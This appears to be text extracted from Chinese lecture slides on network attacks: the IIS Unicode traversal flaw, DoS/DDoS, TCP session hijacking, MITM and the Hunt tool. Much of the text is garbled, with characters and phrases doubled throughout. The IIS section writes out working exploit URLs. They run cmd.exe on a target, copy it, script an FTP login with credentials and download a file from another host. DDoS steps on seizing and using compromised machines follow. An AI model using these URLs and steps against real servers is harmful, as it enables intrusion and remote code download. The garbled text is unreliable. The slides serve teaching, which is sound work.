《工学网络攻击》PPT课件.ppt

1、系系统统漏洞和后漏洞和后门门n系系统统漏洞是程序中无意造成的缺陷，它漏洞是程序中无意造成的缺陷，它形成了一个不被注意的通道。漏洞也指形成了一个不被注意的通道。漏洞也指无意的配置无意的配置错误错误，如使用默，如使用默认认服服务务器配器配置。置。n后后门门是一个在操作系是一个在操作系统统或程序中无或程序中无证证明明文件的通道，通常是由文件的通道，通常是由软软件开件开发发人人员员故故意放置在那里的，以便他意放置在那里的，以便他们们能能够够快速快速对对产产品品进进行支持。行支持。1-IIS UNICODE 漏洞nNSFOCUS安全小安全小组发现组发现IIS 4.0和和IIS 5.0在在Unicode字

2、符解字符解码码的的实现实现中存在一个中存在一个安全漏洞，安全漏洞，导导致用致用户户可以可以远远程通程通过过IIS执执行任意命令。当行任意命令。当IIS打开文件打开文件时时，如果，如果该该文件名包含文件名包含unicode字符，它会字符，它会对对其其进进行行解解码码，如果用，如果用户户提供一些特殊的提供一些特殊的编码编码，将将导导致致IIS错误错误的打开或者的打开或者执执行某些行某些web根目根目录录以外的文件。以外的文件。2-IIS UNICODE 漏洞n对对于于IIS 5.0/4.0中文版，当中文版，当IIS收到的收到的URL请请求求的文件名中包含一个特殊的的文件名中包含一个特殊的编码编码例

3、如例如%c1%hh或者或者%c0%hh,它会首先将其解它会首先将其解码码变变成成:0 xc10 xhh，然后然后尝试尝试打开打开这这个文件，个文件，Windows 系系统认为统认为0 xc10 xhh可能是可能是unicode编编码码，因此它会首先将其解，因此它会首先将其解码码，如果，如果 0 x00=%hh (0 xc1-0 xc0)*0 x40+0 xhh%c0%hh-(0 xc0-0 xc0)*0 x40+0 xhh3-IIS UNICODE 漏洞n因此，利用因此，利用这这种种编码编码，我，我们们可以构造很多字符，可以构造很多字符，例如例如:%c1%1c-(0 xc1-0 xc0)*0

4、x40+0 x1c=0 x5c=/%c0%2f-(0 xc0-0 xc0)*0 x40+0 x2f=0 x2f=攻攻击击者可以利用者可以利用这这个漏洞来个漏洞来绕过绕过IIS的路径的路径检查检查，去，去执执行或者打开任意的文件。行或者打开任意的文件。4-IIS UNICODE 漏洞如果系如果系统统包含某个可包含某个可执执行目行目录录，就可能，就可能执执行任意行任意系系统统命令。命令。n下面的下面的URL可能列出当前目可能列出当前目录录的内容：的内容：http:/目标主机/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dirn利用利用这这个漏洞个漏洞查查看

5、系看系统统文件内容也是可能的文件内容也是可能的：http:/目标主机/a.asp/.%c1%1c./.%c1%1c./winnt/win.ini5-IIS漏洞nhttp:/192.168.0.2/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dirnhttp:/192.168.0.2/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+ccc.exenhttp:/192.168.0.2/scripts/ccc.exe?/c+echo+open+getfilenhtt

6、p:/192.168.0.2/scripts/ccc.exe?/c+type+getfile6-nhttp:/192.168.0.2/scripts/ccc.exe?/c+echo+192.168.0.111+getfilenhttp:/192.168.0.2/scripts/ccc.exe?/c+echo+administrator+getfilenhttp:/192.168.0.2/scripts/ccc.exe?/c+echo+123456+getfilenhttp:/192.168.0.2/scripts/ccc.exe?/c+echo+get+synful+getfile7-nhtt

7、p:/192.168.0.2/scripts/ccc.exe?/c+echo+quit+getfilenhttp:/192.168.0.2/scripts/ccc.exe?/c+ftp+-s:getfile8-拒拒绝绝服服务务攻攻击击nDoS（Denial of Service），其目的是），其目的是使使计计算机或网算机或网络络无法提供正常的服无法提供正常的服务务。最常最常见见的的DoS攻攻击击有有计计算机网算机网络带宽络带宽攻攻击击和和连连通性攻通性攻击击。9-拒拒绝绝服服务务攻攻击击n带宽带宽攻攻击击指以极大的通信量冲指以极大的通信量冲击击网网络络，使得所有可用网使得所有可用网络资络资源都

8、被消耗殆尽，源都被消耗殆尽，最后最后导导致合法的用致合法的用户请户请求就无法通求就无法通过过。n连连通性攻通性攻击击指用大量的指用大量的连连接接请请求冲求冲击计击计算机，使得所有可用的操作系算机，使得所有可用的操作系统资统资源都源都被消耗殆尽，最被消耗殆尽，最终计终计算机无法再算机无法再处处理合理合法用法用户户的的请请求求 10-分布式拒分布式拒绝绝服服务务攻攻击击n(DDoS,Distributed Denial of Service)指指借助于客借助于客户户/服服务务器技器技术术，将多个，将多个计计算机算机联联合起来作合起来作为为攻攻击击平台，平台，对对一个或多个一个或多个目目标发动标发动

9、DoS攻攻击击，从而成倍地提高拒，从而成倍地提高拒绝绝服服务务攻攻击击的威力。的威力。11-分布式拒分布式拒绝绝服服务务攻攻击击nDDoS攻攻击击手段是在手段是在传统传统的的DoS攻攻击击基基础础之上之上产产生的一生的一类类攻攻击击方式。方式。单单一的一的DoS攻攻击击一般是采用一一般是采用一对对一方式的，当攻一方式的，当攻击击目目标标CPU速度低、内存小或者网速度低、内存小或者网络带宽络带宽小小等等各等等各项项性能指性能指标标不高不高时时，它的效果是，它的效果是明明显显的。的。12-分布式拒分布式拒绝绝服服务务攻攻击击n随着随着计计算机与网算机与网络络技技术术的的发发展，展，计计算机算机的的

10、处处理能力迅速增理能力迅速增长长，内存大大增加，内存大大增加，同同时时也出也出现现了千兆了千兆级别级别的网的网络络，这这使得使得DoS攻攻击击的困的困难难程度加大了程度加大了目目标对恶标对恶意攻意攻击击包的包的消化能力消化能力加加强强了不少，例了不少，例如你的攻如你的攻击软击软件每秒件每秒钟钟可以可以发发送送3,000个个攻攻击击包，但我的主机与网包，但我的主机与网络带宽络带宽每秒每秒钟钟可以可以处处理理10,000个攻个攻击击包，包，这样这样一来攻一来攻击击就不会就不会产产生什么效果。生什么效果。13-分布式拒分布式拒绝绝服服务务攻攻击击n高速广泛高速广泛连连接的网接的网络给络给大家大家带带

11、来了方便，也来了方便，也为为DDoS攻攻击创击创造了极造了极为为有利的条件。在低速网有利的条件。在低速网络时络时代代时时，黑客占，黑客占领领攻攻击击用的傀儡机用的傀儡机时时，总总是是会会优优先考先考虑虑离目离目标标网网络络距离近的机器，因距离近的机器，因为经为经过过路由器的跳数少，效果好。而路由器的跳数少，效果好。而现现在在电电信骨干信骨干节节点之点之间间的的连连接都是以接都是以G为级别为级别的，大城市之的，大城市之间间更可以达到更可以达到2.5G的的连连接，接，这这使得攻使得攻击击可以从可以从更更远远的地方或者其他城市的地方或者其他城市发发起，攻起，攻击击者的傀儡者的傀儡机位置可以在分布在更

12、大的范机位置可以在分布在更大的范围围，选择选择起来更起来更灵活了。灵活了。14-分布式拒分布式拒绝绝服服务务攻攻击击n通常，攻通常，攻击击者使用一个者使用一个偷偷窃窃帐帐号将号将DDoS主控程序安装在一个主控程序安装在一个计计算机上，在一个算机上，在一个设设定的定的时间时间主控程序将与大量代理程序主控程序将与大量代理程序通通讯讯，代理程序已，代理程序已经经被安装在被安装在Internet上上的的许许多多计计算机上。代理程序收到指令算机上。代理程序收到指令时时就就发动发动攻攻击击。利用客。利用客户户/服服务务器技器技术术，主，主控程序能在几秒控程序能在几秒钟钟内激活成百上千次代内激活成百上千次代

13、理程序的运行。理程序的运行。15-16-DDOS攻攻击击的步的步骤骤1.搜集了解目搜集了解目标标的情况的情况下列情况是黑客非常关心的情下列情况是黑客非常关心的情报报：n被攻被攻击击目目标标主机数目、地址情况主机数目、地址情况 n目目标标主机的配置、性能主机的配置、性能 n目目标标的的带宽带宽17-DDOS攻攻击击的步的步骤骤2.占占领领傀儡机傀儡机黑客最感黑客最感兴兴趣的是有下列情况的主机：趣的是有下列情况的主机：n链链路状路状态态好的主机好的主机 n性能好的主机性能好的主机 n安全管理水平差的主机安全管理水平差的主机18-2.占占领领傀儡机傀儡机n这这一部分一部分实际实际上是使用了另一大上是

14、使用了另一大类类的攻的攻击击手段：利用形攻手段：利用形攻击击。这这是和是和DDoS并列并列的攻的攻击击方式。方式。简单简单地地说说，就是占，就是占领领和控和控制被攻制被攻击击的主机。取得最高的管理的主机。取得最高的管理权权限，限，或者至少得到一个有或者至少得到一个有权权限完成限完成DDoS攻攻击击任任务务的的帐帐号。号。19-占占领领傀儡机傀儡机n对对于一个于一个DDoS攻攻击击者来者来说说，准，准备备好一定好一定数量的傀儡机是一个必要的条件，下面数量的傀儡机是一个必要的条件，下面说说一下他是如何攻一下他是如何攻击击并占并占领领它它们们的。的。20-占占领领傀儡机傀儡机n首先，黑客做的工作一般

15、是首先，黑客做的工作一般是扫扫描，随机地或者描，随机地或者是有是有针对针对性地利用性地利用扫扫描器去描器去发现发现互互联联网上那些网上那些有漏洞的机器，随后就是有漏洞的机器，随后就是尝试尝试入侵了，入侵了，n黑客黑客现现在占在占领领了一台傀儡机之后，除了做留后了一台傀儡机之后，除了做留后门门擦脚印擦脚印这这些基本工作之外，他会把些基本工作之外，他会把DDoS攻攻击击用的程序上用的程序上载过载过去，一般是利用去，一般是利用ftp。在攻。在攻击击机上，会有一个机上，会有一个DDoS的的发发包程序，黑客就包程序，黑客就是利用它来向受害目是利用它来向受害目标发标发送送恶恶意攻意攻击击包的。包的。21-

16、DDOS攻攻击击的步的步骤骤3.实际实际攻攻击击n经过经过精心准精心准备备之后，黑客就象之后，黑客就象图图示里的那示里的那样样，登登录录到做到做为为控制台的傀儡机，向所有的攻控制台的傀儡机，向所有的攻击击机机发发出命令。出命令。这时这时候埋伏在攻候埋伏在攻击击机中的机中的DDoS攻攻击击程序就会响程序就会响应应控制台的命令，一起向受害主控制台的命令，一起向受害主机以高速度机以高速度发发送大量的数据包，送大量的数据包，导导致它死机或致它死机或是无法响是无法响应应正常的正常的请请求。求。n老到的攻老到的攻击击者一者一边边攻攻击击，还还会用各种手段来会用各种手段来监监视视攻攻击击的效果，在需要的的效

17、果，在需要的时时候候进进行一些行一些调调整。整。简单简单些就是开个窗口不断地些就是开个窗口不断地ping目目标标主机，在主机，在能接到回能接到回应应的的时时候就再加大一些流量或是再命候就再加大一些流量或是再命令更多的傀儡机来加入攻令更多的傀儡机来加入攻击击。22-会会话话劫持劫持n你你Telnet到某台主机，到某台主机，这这就是一次就是一次Telnet会会话话；你你浏览浏览某个网站，某个网站，这这就是一次就是一次HTTP会会话话。而。而会会话话劫持劫持（Session Hijack），就是），就是结结合了合了嗅探嗅探以及以及欺欺骗骗技技术术在内的攻在内的攻击击手段。在一次正常的手段。在一次正常

18、的会会话过话过程当中，攻程当中，攻击击者作者作为为第三方参与到其中，第三方参与到其中，他可以在正常数据包中插入他可以在正常数据包中插入恶恶意数据，也可以意数据，也可以在双方的会在双方的会话话当中当中进进行行监监听，甚至可以是代替听，甚至可以是代替某一方主机接管会某一方主机接管会话话。23-会会话话劫持原理劫持原理n会会话话劫持利用了劫持利用了TCP/IP工作原理来工作原理来设计设计攻攻击击。TCP使用端到端的使用端到端的连连接，即（源接，即（源IP，源，源TCP端口号，目的端口号，目的IP，目的，目的TCP端号）端号）来唯一来唯一标识标识每一条已每一条已经经建立建立连连接的接的TCP链链路。另

19、外，路。另外，TCP在在进进行数据行数据传输时传输时，TCP报报文首部的两个字段序号（文首部的两个字段序号（seq）和确）和确认认序号（序号（ackseq）非常重要。）非常重要。24-会会话话劫持原理劫持原理n序号（序号（seq）和确）和确认认序号（序号（ackseq）是与所携是与所携带带TCP数据数据净净荷（荷（payload）的多少有数）的多少有数值值上的关系：序号字上的关系：序号字段（段（seq）指出了本）指出了本报报文中文中传传送的数送的数据在据在发发送主机所要送主机所要传传送的整个数据送的整个数据流中的流中的顺顺序号，而确序号，而确认认序号字段序号字段（ackseq）指出了）指出了发

20、发送本送本报报文的主文的主机希望接收的机希望接收的对对方主机中下一个八方主机中下一个八位位组组的的顺顺序号。序号。25-会会话话劫持原理劫持原理n因此，因此，对对于一台主机来于一台主机来说说，其收，其收发发的两个相的两个相临临TCP报报文之文之间间的序号和确的序号和确认认序号的关系序号的关系为为：它所要：它所要发发出的出的报报文中的文中的seq值应值应等于它所等于它所刚刚收到的收到的报报文中的文中的ackseq的的值值，而它所要，而它所要发发送送报报文中文中ackseq的的值应为值应为它所收到它所收到报报文中文中seq的的值值加上加上该报该报文中所文中所发发送的送的TCP净净荷的荷的长长度。度

21、。26-会会话话劫持原理劫持原理nTCP会会话话劫持的攻劫持的攻击击方式可以方式可以对对基于基于TCP的任的任何何应应用用发发起攻起攻击击。n对对于攻于攻击击者来者来说说，所必，所必须须要做的就是要做的就是窥窥探到正探到正在在进进行行TCP通信的两台主机之通信的两台主机之间传间传送的送的报报文，文，这样这样攻攻击击者就可以得知者就可以得知该报该报文的源文的源IP、源、源TCP端口号、目的端口号、目的IP、目的、目的TCP端号，从而可以得端号，从而可以得知其中一台主机知其中一台主机对对将要收到的下一个将要收到的下一个TCP报报文文段中段中seq和和ackseq值值的要求。的要求。27-会会话话劫

22、持原理劫持原理n这样这样，在，在该该合法主机收到另一台合法主合法主机收到另一台合法主机机发发送的送的TCP报报文前，攻文前，攻击击者根据所截者根据所截获获的信息向的信息向该该主机主机发发出一个出一个带带有有净净荷的荷的TCP报报文，如果文，如果该该主机先收到攻主机先收到攻击报击报文，就文，就可以把合法的可以把合法的TCP会会话话建立在攻建立在攻击击主机与主机与被攻被攻击击主机之主机之间间。28-会会话话劫持原理劫持原理n带带有有净净荷的攻荷的攻击报击报文能文能够够使被攻使被攻击击主机主机对对下一下一个要收到的个要收到的TCP报报文中的确文中的确认认序号（序号（ackseq）的的值值的要求的要求

23、发发生生变变化，从而使另一台合法的主化，从而使另一台合法的主机向被攻机向被攻击击主机主机发发出的出的报报文被被攻文被被攻击击主机拒主机拒绝绝。TCP会会话话劫持攻劫持攻击击方式的好方式的好处处在于使攻在于使攻击击者避者避开了被攻开了被攻击击主机主机对访问对访问者的身份者的身份验证验证和安全和安全认认证证，从而使攻，从而使攻击击者直接者直接进进入入对对被攻被攻击击主机的的主机的的访问访问状状态态，因此，因此对对系系统统安全构成的威安全构成的威胁胁比比较严较严重。重。29-会会话话劫持分劫持分类类n我我们们可以把会可以把会话话劫持攻劫持攻击击分分为为两种两种类类型：型：1）中中间间人攻人攻击击(M

24、an In The Middle，简简称称MITM)，2）注射式攻）注射式攻击击（Injection）；并且）；并且还还可以可以把会把会话话劫持攻劫持攻击击分分为为两种形式：两种形式：1）被）被动动劫持，劫持，2）主）主动动劫持；被劫持；被动动劫持劫持实际实际上就是在后台上就是在后台监监视视双方会双方会话话的数据流，从中的数据流，从中获获得敏感数据；而得敏感数据；而主主动动劫持劫持则则是将会是将会话话当中的某一台主机当中的某一台主机“踢踢”下下线线，然后由攻，然后由攻击击者取代并接管会者取代并接管会话话，30-中中间间人攻人攻击击 Man-in-the-MiddleAttack，（简简称称“M

25、ITM攻攻击击”）是一种）是一种“间间接接”的入侵攻的入侵攻击击，这这种种攻攻击击模式通模式通过过各种技各种技术术手段将受入侵者手段将受入侵者控制的一台控制的一台计计算机虚算机虚拟拟放置在网放置在网络连络连接接中的两台通信中的两台通信计计算机之算机之间间，这这台台计计算机算机就称就称为为“中中间间人人”。31-中中间间人攻人攻击击 然后入侵者把然后入侵者把这这台台计计算机模算机模拟拟一台或两台一台或两台原始原始计计算机，使算机，使“中中间间人人”能能够够与原始与原始计计算机建立活算机建立活动连动连接并允接并允许许其其读读取或修改取或修改传递传递的信息，然而两个原始的信息，然而两个原始计计算机用

26、算机用户户却却认为认为他他们们是在互相通信。通常，是在互相通信。通常，这这种种“拦拦截数据截数据修改数据修改数据发发送数据送数据”的的过过程就被称程就被称为为“会会话话劫持劫持”（SessionHijack）。32-注射式攻注射式攻击击n它不会改它不会改变变会会话话双方的通双方的通讯讯流，而是在双方正流，而是在双方正常的通常的通讯讯流插入流插入恶恶意数据。在注射式攻意数据。在注射式攻击击中，中，需要需要实现实现两种技两种技术术：1）IP欺欺骗骗，2）预测预测TCP序列号。如果是序列号。如果是UDP协议协议，只需，只需伪伪造造IP地址，地址，然后然后发发送送过过去就可以了，因去就可以了，因为为U

27、DP没有所没有所谓谓的的TCP三次握手，但基于三次握手，但基于UDP的的应应用用协议协议有流控有流控机制，所以也要做一些机制，所以也要做一些额额外的工作。外的工作。对对于于IP欺欺骗骗，有两种情况需要用到：，有两种情况需要用到：1）隐隐藏自己的藏自己的IP地址；地址；2）利用两台机器之利用两台机器之间间的信任关系的信任关系实实施施入侵。入侵。33-34-huntnl/w/r)list/watch/reset connectionsnl(字母字母l)为查为查看当前网看当前网络络上的会上的会话话;nw为监视为监视当前网当前网络络上的某个会上的某个会话话;nr为为重置当前网重置当前网络络上的某个会上

28、的某个会话话。35-huntna)arp/simple hijack(avoids ack storm if arp used)n中中间间人攻人攻击击(会会话话劫持劫持)，Hunt先先进进行行ARP欺欺骗骗，然后，然后进进行会行会话话劫持。使用此方法可以避免出劫持。使用此方法可以避免出现现ACK风风暴。暴。ns)simple hijackn简单简单的会的会话话劫持，也就是注射式攻劫持，也就是注射式攻击击。会出。会出现现ACK风风暴。暴。nd)daemons rst/arp/sniff/macn该选项该选项共共实现实现四个功能，分四个功能，分别为别为：终终止会止会话话，自，自动发动发送送带带RST标标志位的志位的TCP包包;ARP欺欺骗骗后后进进行数据包行数据包转发转发;嗅探功能嗅探功能;在当前网在当前网络络上收集上收集MAC地址。地址。36-